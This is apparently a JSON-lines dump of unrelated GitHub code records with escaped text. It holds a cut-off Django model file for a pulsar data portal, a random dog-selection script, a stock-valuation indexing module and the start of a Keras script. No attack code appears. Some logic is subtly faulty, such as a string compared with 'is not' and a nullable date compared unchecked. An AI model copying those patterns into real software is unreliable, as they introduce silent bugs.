cls.get_snr_results(pulsar_observations)\n\n if not observation_results:\n return None\n\n sqrt_300 = 17.3205080757\n\n return mean([(o[\"snr\"] / math.sqrt(o[\"length\"]) * sqrt_300) for o in observation_results])\n\n @classmethod\n def get_max_snr_over_5min(cls, pulsar_observations):\n observation_results = cls.get_snr_results(pulsar_observations)\n\n if not observation_results:\n return None\n\n sqrt_300 = 17.3205080757\n\n return max((o[\"snr\"] / math.sqrt(o[\"length\"]) * sqrt_300) for o in observation_results)\n\n\nclass FoldPulsarFile(models.Model):\n fold_pulsar = models.ForeignKey(\"FoldPulsar\", related_name=\"files\", on_delete=models.CASCADE)\n file_meta = models.CharField(max_length=64, null=True)\n file = models.FileField()\n\n @property\n def project(self):\n return self.file_meta.split(\".\")[0]\n\n @property\n def file_type(self):\n return self.file_meta.split(\".\")[2]\n\n @property\n def size(self):\n return self.file.size if self.file.storage.exists(self.file.name) else 0\n\n @property\n def download_link(self):\n return self.file.name\n\n\nclass FoldDetailImage(models.Model):\n fold_pulsar_detail = models.ForeignKey(\"FoldPulsarDetail\", related_name=\"images\", on_delete=models.CASCADE)\n image_type = models.CharField(max_length=64, null=True)\n url = models.URLField()\n\n @property\n def plot_type(self):\n return self.image_type.split(\".\")[-2]\n\n @property\n def generic_plot_type(self):\n return next(\n (key for key, values in PLOT_NAMES.items() if self.plot_type in values),\n self.plot_type,\n )\n\n @property\n def resolution(self):\n # Resolution is either 'hi', 'lo' or size in the form '300x240'\n # We will assume anything with a height lower than 600 is 'lo' res\n try:\n resolution = self.image_type.split(\".\")[-1]\n return \"lo\" if int(resolution.split(\"x\")[0]) < 600 else \"hi\"\n except ValueError:\n return self.image_type.split(\".\")[-1]\n\n @property\n def process(self):\n image_details = self.image_type.split(\".\")\n return image_details[0] if len(image_details) > 2 else \"raw\"\n\n\nclass FoldPulsarDetail(models.Model):\n fold_pulsar = models.ForeignKey(FoldPulsar, on_delete=models.CASCADE)\n utc = models.DateTimeField() # start time\n project = models.CharField(max_length=50)\n embargo_end_date = models.DateTimeField(null=True)\n proposal = models.CharField(max_length=40)\n ephemeris = JSONField(null=True)\n ephemeris_is_updated_at = models.DateTimeField(null=True)\n length = models.FloatField(null=True)\n beam = models.IntegerField()\n bw = models.DecimalField(max_digits=12, decimal_places=2)\n nchan = models.IntegerField()\n band = models.CharField(choices=BAND_CHOICES, max_length=7)\n nbin = models.IntegerField()\n nant = models.IntegerField(null=True)\n nant_eff = models.IntegerField(null=True)\n dm_fold = models.DecimalField(max_digits=12, decimal_places=4, null=True)\n dm_meerpipe = models.DecimalField(max_digits=12, decimal_places=4, null=True)\n rm_meerpipe = models.DecimalField(max_digits=12, decimal_places=4, null=True)\n sn_backend = models.DecimalField(max_digits=12, decimal_places=1, null=True)\n sn_meerpipe = models.DecimalField(max_digits=12, decimal_places=1, null=True)\n flux = models.DecimalField(max_digits=12, decimal_places=6, null=True)\n ra = models.CharField(max_length=16, null=True)\n dec = models.CharField(max_length=16, null=True)\n tsubint = models.DecimalField(max_digits=12, decimal_places=1, null=True)\n schedule = models.CharField(max_length=16, null=True)\n phaseup = models.CharField(max_length=16, null=True)\n 
frequency = models.DecimalField(null=True, max_digits=15, decimal_places=9)\n npol = models.IntegerField(null=True)\n ephemeris_download_link = models.URLField(null=True)\n toas_download_link = models.URLField(null=True)\n\n class Meta:\n ordering = [\"-utc\"]\n\n @property\n def estimated_size(self):\n \"\"\"Estimated size of the observation data stored on disk in bytes.\"\"\"\n try:\n return math.ceil(self.length / float(self.tsubint)) * self.nbin * self.nchan * self.npol * 2\n except ZeroDivisionError:\n return 0\n\n @property\n def jname(self):\n return self.fold_pulsar.jname\n\n @property\n def session(self):\n return Sessions.get_session(self.utc)\n\n def get_band_centre_frequency(self):\n # Centre frequency is currnently used as part of the file structure\n # on OzStar as an int value. Most common is 1284.\n # We need to calculate this so we can get the correct path of files for download.\n band = BANDS.get(self.band)\n return int(band[\"centre_frequency\"]) if band else None\n\n def is_restricted(self, user):\n # If the user role isn't restricted they can access everything\n if user.role.upper() in [UserRole.UNRESTRICTED.value, UserRole.ADMIN.value]:\n return False\n\n # If there's no embargo then it's not restricted\n return self.embargo_end_date >= datetime.now(tz=pytz.UTC)\n\n @classmethod\n def get_sn_meerpipe(cls, folding, project_short):\n try:\n pipeline_name = f\"MeerPIPE_{project_short}\"\n return folding.processing.processings_set.get(pipeline__name=pipeline_name).results.get(\"snr\", None)\n except Processings.DoesNotExist:\n return None\n\n @classmethod\n def get_ephemeris_link(cls, pulsar):\n # ex: 'https://pulsars.org.au/media/MeerKAT/MeerPIPE_TPA/J1909-3744/2022-08-29-19:03:27/3/J1909-3744.par\n\n foldings = Foldings.objects.filter(folding_ephemeris__pulsar=pulsar)\n\n for folding in foldings:\n pipeline_files = Pipelinefiles.objects.filter(processing__parent=folding.processing)\n for pipleline_file in pipeline_files:\n if str(pipleline_file.file).endswith(f\"{pulsar.jname}.par\"):\n return str(pipleline_file.file)\n\n return \"\"\n\n @classmethod\n def get_toas_link(cls, pulsar):\n # ex: 'https://pulsars.org.au/media/MeerKAT/MeerPIPE_PTA/\n # J1843-1448/2022-08-29-18:20:32/3/pta.J1843-1448_global.tim.gz'\n\n foldings = Foldings.objects.filter(folding_ephemeris__pulsar=pulsar)\n\n for folding in foldings:\n pipeline_files = Pipelinefiles.objects.filter(processing__parent=folding.processing)\n for pipleline_file in pipeline_files:\n if str(pipleline_file.file).endswith(f\"{pulsar.jname}_global.tim.gz\"):\n return str(pipleline_file.file)\n\n return \"\"\n\n @classmethod\n def get_flux(cls, folding, project_short):\n \"\"\"Get the flux value for a folding observation.\"\"\"\n\n # If it's a molonglo observation we can just get the latest flux value.\n if project_short == \"MONSPSR_TIMING\":\n try:\n return folding.processing.results.get(\"flux\", None)\n except Processings.DoesNotExist:\n return None\n\n pipeline_name = f\"MeerPIPE_{project_short}\"\n try:\n # We want the flux value set to the real project if there is one.\n flux = folding.processing.processings_set.get(pipeline__name=pipeline_name).results.get(\"flux\", None)\n\n if flux is not None:\n return flux\n # The order to try projects as set by the science team.\n project_priority = [\"MeerPIPE_PTA\", \"MeerPIPE_TPA\", \"MeerPIPE_RelBin\"]\n\n # Remove the actual folding observation project because we try that first.\n project_priority_order = [project for project in project_priority if project is not 
pipeline_name]\n\n # It's better to have a value from another project than no value at all.\n for project in project_priority_order:\n flux = folding.processing.processings_set.get(pipeline__name=project).results.get(\"flux\", None)\n if flux is not None:\n return flux\n\n except Processings.DoesNotExist:\n return None\n\n @classmethod\n def bulk_update_or_create(cls, foldings):\n to_create = []\n fold_detail_images = {}\n\n fold_pulsars = FoldPulsar.objects.filter(\n Q(jname__in=[f.folding_ephemeris.pulsar.jname for f in foldings])\n | Q(main_project__in=[f.processing.observation.project.program.name for f in foldings])\n )\n\n for folding in foldings:\n pulsar = folding.folding_ephemeris.pulsar\n observation = folding.processing.observation\n main_project = observation.project.program.name\n\n def pulsar_check(filter_pulsar):\n return filter_pulsar.jname == pulsar.jname and filter_pulsar.main_project == main_project\n\n for fold_pulsar in filter(pulsar_check, fold_pulsars):\n # Calculate and set the embargo end date from observation and main project.\n # At this stage, we use the observation utc_start and main_project's\n # embargo_period to do the calculation,\n # later we will apply the processing.embargo_end as well.\n embargo_end_date = observation.utc_start + observation.project.embargo_period\n\n results = folding.processing.results or {}\n project_short = observation.project.short\n\n sn_meerpipe = cls.get_sn_meerpipe(folding, project_short)\n flux = cls.get_flux(folding, project_short)\n\n to_create.append(\n FoldPulsarDetail(\n fold_pulsar=fold_pulsar,\n utc=observation.utc_start,\n project=observation.project.short,\n embargo_end_date=embargo_end_date,\n proposal=observation.project.code,\n ephemeris=folding.folding_ephemeris.ephemeris,\n ephemeris_is_updated_at=folding.folding_ephemeris.created_at,\n length=observation.duration,\n beam=observation.instrument_config.beam,\n bw=observation.instrument_config.bandwidth,\n ra=observation.target.raj,\n dec=observation.target.decj,\n nchan=folding.nchan,\n tsubint=folding.tsubint,\n band=fold_pulsar.get_band(observation.instrument_config.frequency),\n nbin=folding.nbin,\n nant=observation.nant,\n nant_eff=observation.nant_eff,\n dm_fold=folding.dm,\n dm_meerpipe=folding.folding_ephemeris.dm,\n rm_meerpipe=folding.folding_ephemeris.rm,\n sn_backend=results.get(\"snr\", None),\n flux=flux,\n sn_meerpipe=sn_meerpipe,\n schedule=\"12\",\n phaseup=\"12\",\n frequency=observation.instrument_config.frequency,\n npol=folding.npol,\n ephemeris_download_link=cls.get_ephemeris_link(pulsar=pulsar),\n toas_download_link=cls.get_toas_link(pulsar=pulsar),\n )\n )\n\n fold_detail_images[len(to_create) - 1] = []\n # Find all TOA entries with a matching fold_id. These TOA entries should each link back to an entry in\n # processings, with only one processing per pipeline (i.e. project code). 
Those processing entries than\n # link forwards to the pipelineimages table.\n for toas in folding.toas_set.all():\n for image in toas.processing.pipelineimages_set.all():\n fold_detail_images[len(to_create) - 1].append(\n FoldDetailImage(image_type=image.image_type, url=image.image.name)\n )\n # Also process the raw images\n for image in folding.processing.pipelineimages_set.all():\n fold_detail_images[len(to_create) - 1].append(\n FoldDetailImage(image_type=image.image_type, url=image.image.name)\n )\n\n FoldPulsarDetail.objects.all().delete()\n FoldPulsarDetail.objects.bulk_create(to_create)\n\n fold_pulsar_detail_objects = FoldPulsarDetail.objects.all().order_by(\"id\")\n images_something_else = []\n\n for index, images in fold_detail_images.items():\n for image in images:\n image.fold_pulsar_detail = fold_pulsar_detail_objects[index]\n\n images_something_else.extend(images)\n\n FoldDetailImage.objects.bulk_create(images_something_else)\n\n @classmethod\n def update_or_create(cls, folding):\n pulsar = folding.folding_ephemeris.pulsar\n observation = folding.processing.observation\n main_project = observation.project.program.name\n\n try:\n fold_pulsar = FoldPulsar.objects.get(jname=pulsar.jname, main_project=main_project)\n except FoldPulsar.DoesNotExist:\n print(\"FoldPulsar \", pulsar.jname, main_project, \" does not exist\")\n return\n except AttributeError:\n # If an observation doesn't have a project or program we want to skip it.\n # Hopefully this never happens.\n return\n\n # Calculate and set the embargo end date from observation and main project.\n # At this stage, we use the observation utc_start and main_project's embargo_period to do the calculation,\n # later we will apply the processing.embargo_end as well.\n embargo_end_date = observation.utc_start + observation.project.embargo_period\n\n results = folding.processing.results or {}\n project_short = observation.project.short\n\n sn_meerpipe = cls.get_sn_meerpipe(folding, project_short)\n flux = cls.get_flux(folding, project_short)\n\n new_fold_pulsar_detail, created = FoldPulsarDetail.objects.update_or_create(\n fold_pulsar=fold_pulsar,\n utc=observation.utc_start,\n defaults={\n \"project\": observation.project.short,\n \"embargo_end_date\": embargo_end_date,\n \"proposal\": observation.project.code,\n \"ephemeris\": folding.folding_ephemeris.ephemeris,\n \"ephemeris_is_updated_at\": folding.folding_ephemeris.created_at,\n \"length\": observation.duration,\n \"beam\": observation.instrument_config.beam,\n \"bw\": observation.instrument_config.bandwidth,\n \"ra\": observation.target.raj,\n \"dec\": observation.target.decj,\n \"nchan\": folding.nchan,\n \"tsubint\": folding.tsubint,\n \"band\": fold_pulsar.get_band(observation.instrument_config.frequency),\n \"nbin\": folding.nbin,\n \"nant\": observation.nant,\n \"nant_eff\": observation.nant_eff,\n \"dm_fold\": folding.dm,\n \"dm_meerpipe\": folding.folding_ephemeris.dm,\n \"rm_meerpipe\": folding.folding_ephemeris.rm,\n \"sn_backend\": results.get(\"snr\", None),\n \"flux\": flux,\n \"sn_meerpipe\": sn_meerpipe,\n \"schedule\": \"12\",\n \"phaseup\": \"12\",\n \"frequency\": observation.instrument_config.frequency,\n \"npol\": folding.npol,\n \"ephemeris_download_link\": cls.get_ephemeris_link(pulsar=pulsar),\n \"toas_download_link\": cls.get_toas_link(pulsar=pulsar),\n },\n )\n\n # Find all TOA entries with a matching fold_id. These TOA entries should each link back to an entry in\n # processings, with only one processing per pipeline (i.e. project code). 
Those processing entries than link\n # forwards to the pipelineimages table.\n for toas in folding.toas_set.all():\n for image in toas.processing.pipelineimages_set.all():\n FoldDetailImage.objects.update_or_create(\n fold_pulsar_detail=new_fold_pulsar_detail,\n image_type=image.image_type,\n defaults={\"url\": image.image.name},\n )\n # Also process the raw images\n for image in folding.processing.pipelineimages_set.all():\n FoldDetailImage.objects.update_or_create(\n fold_pulsar_detail=new_fold_pulsar_detail,\n image_type=image.image_type,\n defaults={\"url\": image.image.name},\n )\n\n return new_fold_pulsar_detail, created\n\n @classmethod\n def format_utc(cls, utc):\n return datetime.strptime(utc, \"%Y-%m-%d-%H:%M:%S\")\n\n @classmethod\n def get_query(cls, **kwargs):\n if \"jname\" in kwargs:\n kwargs[\"fold_pulsar__jname\"] = kwargs.pop(\"jname\")\n\n if \"main_project\" in kwargs:\n kwargs[\"fold_pulsar__main_project\"] = kwargs.pop(\"main_project\")\n\n if \"utc\" in kwargs:\n kwargs[\"utc\"] = cls.format_utc(kwargs[\"utc\"])\n\n return cls.objects.filter(**kwargs)\n\n\nclass SearchmodePulsarDetail(models.Model):\n searchmode_pulsar = models.ForeignKey(SearchmodePulsar, on_delete=models.CASCADE)\n utc = models.DateTimeField()\n embargo_end_date = models.DateTimeField(null=True)\n project = models.CharField(max_length=50)\n ra = models.CharField(max_length=16)\n dec = models.CharField(max_length=16)\n length = models.FloatField(null=True)\n beam = models.IntegerField()\n frequency = models.DecimalField(max_digits=50, decimal_places=8)\n nchan = models.IntegerField()\n nbit = models.IntegerField()\n nant_eff = models.IntegerField(null=True)\n npol = models.IntegerField()\n dm = models.DecimalField(max_digits=12, decimal_places=4)\n tsamp = models.DecimalField(max_digits=12, decimal_places=2)\n\n class Meta:\n ordering = [\"-utc\"]\n\n @classmethod\n def update_or_create(cls, filter_bankings):\n observation = filter_bankings.processing.observation\n searchmode_pulsar = SearchmodePulsar.objects.get(jname=observation.target.name)\n\n # calculate and set the embargo end date from observation and main project(observation.project??).\n # at this stage, we use the observation utc_start and main_project's embargo_period to do the calculation\n # later we will apply the processing.embargo_end as well\n embargo_end_date = observation.utc_start + observation.project.embargo_period\n\n return cls.objects.update_or_create(\n searchmode_pulsar=searchmode_pulsar,\n utc=filter_bankings.processing.observation.utc_start,\n defaults={\n \"project\": observation.project.short,\n \"embargo_end_date\": embargo_end_date,\n \"ra\": observation.target.raj,\n \"dec\": observation.target.decj,\n \"length\": observation.duration,\n \"beam\": observation.instrument_config.beam,\n \"frequency\": observation.instrument_config.frequency,\n \"nchan\": filter_bankings.nchan,\n \"nbit\": filter_bankings.nbit,\n \"nant_eff\": observation.nant_eff,\n \"npol\": filter_bankings.npol,\n \"dm\": filter_bankings.dm,\n \"tsamp\": filter_bankings.tsamp,\n },\n )\n\n @classmethod\n def get_query(cls, **kwargs):\n if \"jname\" in kwargs:\n kwargs[\"searchmode_pulsar__jname\"] = kwargs.pop(\"jname\")\n\n if \"project\" in kwargs:\n kwargs[\"searchmode_pulsar__main_project\"] = kwargs.pop(\"project\")\n\n return cls.objects.filter(**kwargs)\n\n\nclass SessionDisplay(models.Model):\n start = models.DateTimeField()\n end = models.DateTimeField()\n number_of_observations = models.IntegerField()\n number_of_pulsars = 
models.IntegerField()\n list_of_pulsars = models.TextField(null=True)\n frequency = models.FloatField(null=True)\n projects = models.CharField(max_length=2000, null=True)\n total_integration = models.IntegerField()\n n_dish_min = models.IntegerField(null=True)\n n_dish_max = models.IntegerField(null=True)\n zap_fraction = models.FloatField(null=True)\n\n class Meta:\n ordering = [\"-start\"]\n\n @classmethod\n def update_or_create(cls, session):\n session_pulsars = SessionPulsar.objects.filter(\n session_display__start=session.start, session_display__end=session.end\n )\n\n number_of_observations = 0\n\n n_dish_max = None\n n_dish_min = None\n\n for session_pulsar in session_pulsars.all():\n if session_pulsar.fold_pulsar:\n number_of_observations += session_pulsar.fold_pulsar.foldpulsardetail_set.filter(\n utc__range=(session.start, session.end)\n ).count()\n min_nant_eff, max_nant_eff = (\n session_pulsar.fold_pulsar.foldpulsardetail_set.filter(utc__range=(session.start, session.end))\n .aggregate(models.Min(\"nant_eff\"), models.Max(\"nant_eff\"))\n .values()\n )\n\n if n_dish_min:\n n_dish_min = min_nant_eff if n_dish_min > min_nant_eff else n_dish_min\n else:\n n_dish_min = min_nant_eff\n\n if n_dish_max:\n n_dish_max = max_nant_eff if n_dish_max < max_nant_eff else n_dish_max\n else:\n n_dish_max = max_nant_eff\n\n if session_pulsar.search_pulsar:\n number_of_observations += session_pulsar.search_pulsar.searchmodepulsardetail_set.filter(\n utc__range=(session.start, session.end)\n ).count()\n min_nant_eff, max_nant_eff = (\n session_pulsar.search_pulsar.searchmodepulsardetail_set.filter(\n utc__range=(session.start, session.end)\n )\n .aggregate(models.Min(\"nant_eff\"), models.Max(\"nant_eff\"))\n .values()\n )\n\n if n_dish_min:\n n_dish_min = min_nant_eff if n_dish_min > min_nant_eff else n_dish_min\n else:\n n_dish_min = min_nant_eff\n\n if n_dish_max:\n n_dish_max = max_nant_eff if n_dish_max < max_nant_eff else n_dish_max\n else:\n n_dish_max = max_nant_eff\n\n projects = \", \".join({session_pulsar.project for session_pulsar in session_pulsars})\n\n list_of_pulsars = \", \".join(\n set.union(\n {session_pulsar.fold_pulsar.jname for session_pulsar in session_pulsars if session_pulsar.fold_pulsar},\n {\n session_pulsar.search_pulsar.jname\n for session_pulsar in session_pulsars\n if session_pulsar.search_pulsar\n },\n )\n )\n\n total_integration = sum(session.integrations for session in session_pulsars)\n\n # Because we only create a new session per start time we need to work out if we need to keep the old end or use\n # the new one based on which is later. 
This is fixes an issue with the way Sessions are created in the ingest.\n try:\n current_end = cls.objects.get(start=session.start).end\n end = current_end if current_end > session.end else session.end\n except cls.DoesNotExist:\n end = session.end\n\n return cls.objects.update_or_create(\n start=session.start,\n defaults={\n \"end\": end,\n \"number_of_observations\": number_of_observations,\n \"frequency\": getattr(\n session_pulsars.filter(frequency__isnull=False).first(),\n \"frequency\",\n None,\n ),\n \"number_of_pulsars\": session_pulsars.count(),\n \"list_of_pulsars\": list_of_pulsars,\n \"projects\": projects,\n \"total_integration\": total_integration,\n \"n_dish_min\": n_dish_min,\n \"n_dish_max\": n_dish_max,\n \"zap_fraction\": 0,\n },\n )\n\n @classmethod\n def get_query(cls, **kwargs):\n return cls.objects.filter(number_of_observations__gt=0, **kwargs)\n\n @classmethod\n def get_last_session(cls):\n return cls.objects.first()\n\n @classmethod\n def get_query_instance(cls, **kwargs):\n if \"project\" in kwargs and kwargs[\"project\"] == \"All\":\n kwargs.pop(\"project\")\n\n if \"start\" in kwargs and \"end\" in kwargs:\n kwargs[\"start\"] = parser.parse(kwargs.get(\"start\", \"\"))\n kwargs[\"end\"] = parser.parse(kwargs.get(\"end\", \"\"))\n return cls.objects.get(**kwargs)\n\n elif \"utc\" in kwargs:\n utc = parser.parse(kwargs.pop(\"utc\"))\n return cls.objects.get(start__lte=utc, end__gte=utc)\n\n else:\n return cls.get_last_session()\n\n def get_session_pulsars(self, **kwargs):\n if \"project\" in kwargs and kwargs[\"project\"] == \"All\":\n kwargs.pop(\"project\")\n\n return self.sessionpulsar_set.filter(**kwargs)\n\n\nclass SessionPulsar(models.Model):\n session_display = models.ForeignKey(SessionDisplay, on_delete=models.CASCADE)\n fold_pulsar = models.ForeignKey(FoldPulsar, null=True, on_delete=models.CASCADE)\n search_pulsar = models.ForeignKey(SearchmodePulsar, null=True, on_delete=models.CASCADE)\n utc = models.DateTimeField()\n project = models.CharField(max_length=50)\n backendSN = models.IntegerField(null=True)\n integrations = models.IntegerField()\n beam = models.IntegerField()\n frequency = models.DecimalField(max_digits=50, decimal_places=8)\n flux_hi = models.URLField(null=True)\n flux_lo = models.URLField(null=True)\n phase_vs_frequency_hi = models.URLField(null=True)\n phase_vs_frequency_lo = models.URLField(null=True)\n phase_vs_time_hi = models.URLField(null=True)\n phase_vs_time_lo = models.URLField(null=True)\n\n class Meta:\n ordering = [\"-session_display__start\"]\n\n @property\n def jname(self):\n return self.fold_pulsar.jname\n\n @property\n def pulsar_type(self):\n return \"search\" if self.search_pulsar else \"fold\"\n\n @classmethod\n def get_session_image(cls, images, plot_type, resolution=\"hi\"):\n # Make sure there are images to process.\n if images is None:\n return None\n\n # Try and find a cleaned image favouring this order: relbin, tpa, pta.\n # Skip if it's a bad plot type by setting [] as the default.\n for name in PLOT_NAMES.get(plot_type, []):\n if images.filter(image_type=f\"relbin.{name}.{resolution}\").exists():\n return images.get(image_type=f\"relbin.{name}.{resolution}\").url\n\n if images.filter(image_type=f\"tpa.{name}.{resolution}\").exists():\n return images.get(image_type=f\"tpa.{name}.{resolution}\").url\n\n if images.filter(image_type=f\"pta.{name}.{resolution}\").exists():\n return images.get(image_type=f\"pta.{name}.{resolution}\").url\n\n # If there's no cleaned image try and get a raw image.\n try:\n return 
images.get(image_type=f\"{plot_type}.{resolution}\").url\n except FoldDetailImage.DoesNotExist:\n return None\n\n @classmethod\n def update_or_create(cls, session, pulsar):\n if isinstance(pulsar, SearchmodePulsar):\n last_observation = pulsar.searchmodepulsardetail_set.filter(utc__range=(session.start, session.end)).last()\n images = None\n fold_pulsar = None\n search_pulsar = pulsar\n elif isinstance(pulsar, FoldPulsar):\n last_observation = pulsar.foldpulsardetail_set.filter(utc__range=(session.start, session.end)).last()\n images = last_observation.images.all()\n fold_pulsar = pulsar\n search_pulsar = None\n else:\n return False, None\n\n return cls.objects.update_or_create(\n session_display=session,\n fold_pulsar=fold_pulsar,\n search_pulsar=search_pulsar,\n defaults={\n \"utc\": last_observation.utc,\n \"project\": last_observation.project,\n \"backendSN\": getattr(last_observation, \"sn_backend\", None),\n \"integrations\": last_observation.length,\n \"beam\": last_observation.beam,\n \"frequency\": last_observation.frequency,\n \"flux_hi\": cls.get_session_image(images, \"flux\"),\n \"flux_lo\": cls.get_session_image(images, \"flux\"),\n \"phase_vs_frequency_hi\": cls.get_session_image(images, \"freq\"),\n \"phase_vs_frequency_lo\": cls.get_session_image(images, \"freq\"),\n \"phase_vs_time_hi\": cls.get_session_image(images, \"time\"),\n \"phase_vs_time_lo\": cls.get_session_image(images, \"time\"),\n },\n )\n","repo_name":"gravitationalwavedc/meertime_dataportal","sub_path":"backend/web_cache/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":40016,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"20"} +{"seq_id":"39728658896","text":"'''\r\nFuture impovements:\r\nIterate through tabs, starting at most recect tab and working backwards so as not to include dogs removed from study\r\n'''\r\n\r\n\r\n\r\n#import libraries\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom datetime import datetime\r\nimport PySimpleGUI as sg\r\nimport os\r\nimport sys\r\n\r\ndef Repeat(x):\r\n _size = len(x) #Get size of list\r\n repeated = [] #Initiate list for duplicate values\r\n for i in range(_size): #Iterate over array the size of the user id\r\n k = i + 1 #range + 1\r\n for j in range(k, _size):\r\n if x[i] == x[j] and x[i] not in repeated:\r\n repeated.append(x[i])\r\n return repeated\r\n\r\n#Create GUI to input file path\r\nsg.theme('DarkAmber')\r\n# All the stuff inside window.\r\nlayout = [[sg.Text('Select File:')],\r\n [sg.In(),sg.FileBrowse()],\r\n [sg.Text('Select Output Folder:')],\r\n [sg.In(),sg.FolderBrowse()],\r\n [sg.Text('Name File:')],\r\n [sg.In()],\r\n [sg.Button('Ok'), sg.Button('Cancel')]]\r\n\r\n# Create the Window\r\nwindow = sg.Window('Window Title', layout)\r\n# Event Loop to process \"events\" and get the \"values\" of the inputs\r\nwhile True:\r\n event, values = window.read()\r\n if event == sg.WIN_CLOSED or event == 'Cancel': # if user closes window or clicks cancel\r\n window.close()\r\n sys.exit()\r\n break\r\n if event == 'Ok': #if user clicks okay\r\n file_path = values.get(0)\r\n output_path = values.get(1)\r\n file_name = values.get(2)\r\n window.close()\r\n break\r\n\r\n#Drives and File Paths\r\n#Drive = 'C:\\\\'\r\n#Output = os.path.join(Drive, 'Python', 'RandomDogSelection', 'Output')\r\n\r\n#Get current datetime\r\nnow = datetime.now()\r\ndt_string = now.strftime(\"%Y%m%d%H%S\")\r\n\r\n#Import extract\r\ndf = pd.read_excel(file_path)\r\n\r\n#Create copy of extract\r\ndf_1 = df\r\n\r\n#Get 
List of userid's\r\nuser_ids = df['User ID'].tolist()\r\n\r\n#Get repeated id's in user_ids\r\ndupes = Repeat(user_ids)\r\n\r\n#Remove all dupes from orginal df\r\nfor dupe in dupes:\r\n df = df[df['User ID'] != dupe]\r\n\r\n#For each duplicate userid in df_1 (copy), randomly select one dog and append to df containing non-duplicate ids in\r\n#filtered df\r\nfor dupe in dupes:\r\n filt_1 = df_1[df_1['User ID'] == dupe]\r\n length = len(filt_1)\r\n rand = np.random.randint(0, length)\r\n filt_2 = filt_1.iloc[[rand]]\r\n df = pd.concat([df, filt_2])\r\n\r\n#Input file name - maybe change to a GUI in futute?\r\n#file_name = input('Please Name Your File: ')\r\n#Output to excel\r\n#df.to_excel(output_path + '\\{}_{}.xlsx'.format(file_name, dt_string), index=False)\r\n\r\nprint(\"Random Selection Complete\")\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"arwDT/Random-Dog-Selection","sub_path":"RandomDogSelect.py","file_name":"RandomDogSelect.py","file_ext":"py","file_size_in_byte":2662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"3655971406","text":"import json\n\nimport numpy as np\nimport pandas as pd\n\nfrom historical_data.cache.redis_wrapper import RedisWrapper, make_md5_id\n\n\nSTAT_METHODS = [\"mean\", \"median\", \"min\", \"max\"]\n\n\ndef create_df_file_from_fundamentals_index(fundamentals_index_file, output_path):\n with open(fundamentals_index_file) as f:\n content = json.loads(f.read())\n json_lines = []\n for line in content:\n general = line[\"General\"]\n highlights = line[\"Highlights\"]\n valuation = line[\"Valuation\"]\n\n pe_ratio = highlights[\"PERatio\"] if highlights[\"PERatio\"] is not None else 0\n peg_ratio = highlights[\"PEGRatio\"] if highlights[\"PEGRatio\"] is not None else 0\n book = highlights[\"BookValue\"] if highlights[\"BookValue\"] is not None else 0\n eps = highlights[\"EarningsShare\"] if highlights[\"EarningsShare\"] is not None else 0\n pm = highlights[\"ProfitMargin\"] if highlights[\"ProfitMargin\"] is not None else 0\n op = highlights[\"OperatingMarginTTM\"] if highlights[\"OperatingMarginTTM\"] is not None else 0\n rps = highlights[\"RevenuePerShareTTM\"] if highlights[\"RevenuePerShareTTM\"] is not None else 0\n qrg = highlights[\"QuarterlyRevenueGrowthYOY\"] if highlights[\"QuarterlyRevenueGrowthYOY\"] is not None else 0\n ps_ratio = valuation[\"PriceSalesTTM\"] if valuation[\"PriceSalesTTM\"] is not None else 0\n pb_ratio = valuation[\"PriceBookMRQ\"] if valuation[\"PriceBookMRQ\"] is not None else 0\n\n d = {\n \"sector\": general[\"Sector\"],\n \"industry\": general[\"Industry\"],\n \"code\": general[\"Code\"],\n \"peRatio\": pe_ratio,\n \"pegRatio\": peg_ratio,\n \"bookValue\": book,\n \"eps\": eps,\n \"profitMargin\": pm,\n \"operatingMargin\": op,\n \"revenuePerShare\": rps,\n \"quarterlyRevenueGrowth\": qrg,\n \"psRatio\": ps_ratio,\n \"pbRatio\": pb_ratio\n }\n json_lines.append(d)\n\n index_output_file = output_path + \"df_index.json\"\n with open(index_output_file, \"w\") as output_file:\n output_file.write(json.dumps(json_lines))\n return index_output_file\n\n\ndef make_industry_grouped_valuation_index(df_index_file, output_path):\n d = {}\n df = pd.read_json(df_index_file)\n\n dfg = df.groupby([\"industry\"])\n for col in df.keys():\n if col in [\"code\", \"sector\", \"industry\"]:\n continue\n\n for stat_method in STAT_METHODS:\n method = getattr(dfg[col], stat_method)\n series = method()\n for group_key in series.keys():\n if group_key not in 
d:\n d[group_key] = {}\n\n prop = f\"{col}{stat_method.capitalize()}\"\n if prop not in d:\n d[group_key][prop] = float(series[group_key])\n lines = []\n r = RedisWrapper()\n for industry in d.keys():\n rec = {\n \"id\": industry,\n \"industry\": industry,\n \"hid\": make_md5_id(industry),\n **d[industry]\n }\n lines.append(rec)\n r.add_dict_to_hset(\"IndustryGroupedKeyHighlightsIndex\", industry, rec)\n\n file = output_path + \"industry_grouped_key_valuations_highlights_index.json\"\n with open(file, \"w\") as output_file:\n output_file.write(json.dumps(lines))\n return file\n\n\ndef make_industry_ranked_valuation_index(df_index_file, output_path):\n df = pd.read_json(df_index_file)\n df = df.replace(0, np.NaN)\n\n dfg = df.groupby([\"industry\"])\n for col in df.keys():\n if col in [\"code\", \"sector\", \"industry\"]:\n continue\n\n df_ranked = dfg[col].rank(\"average\")\n df[f\"{col}Rank\"] = df_ranked\n\n r = RedisWrapper()\n for index, row in df.iterrows():\n for key in row.keys():\n val = row[key]\n if type(val) != str:\n if np.isnan(val):\n val = 0\n r.add_one_to_hset(\"StockOverviewKeyHighlightsIndexWithRanks\", row[\"code\"], key, val)\n\n output_file = output_path + \"df_industry_ranked_key_highlights_index.json\"\n df.to_json(path_or_buf=output_file, orient=\"records\")\n return output_file\n","repo_name":"pavelbogomolenko/stock-analyzer-tools","sub_path":"stock_data_analysis/historical_data/stats/eod/highlights_and_valuation_index.py","file_name":"highlights_and_valuation_index.py","file_ext":"py","file_size_in_byte":4295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"7375732905","text":"import numpy as np\r\nimport tensorflow as tf\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Convolution2D\r\nfrom keras.layers import MaxPooling2D\r\nfrom keras.layers import Flatten, Dropout\r\nfrom keras.layers import Dense\r\nfrom keras.callbacks import EarlyStopping\r\nfrom keras.utils import to_categorical\r\nfrom 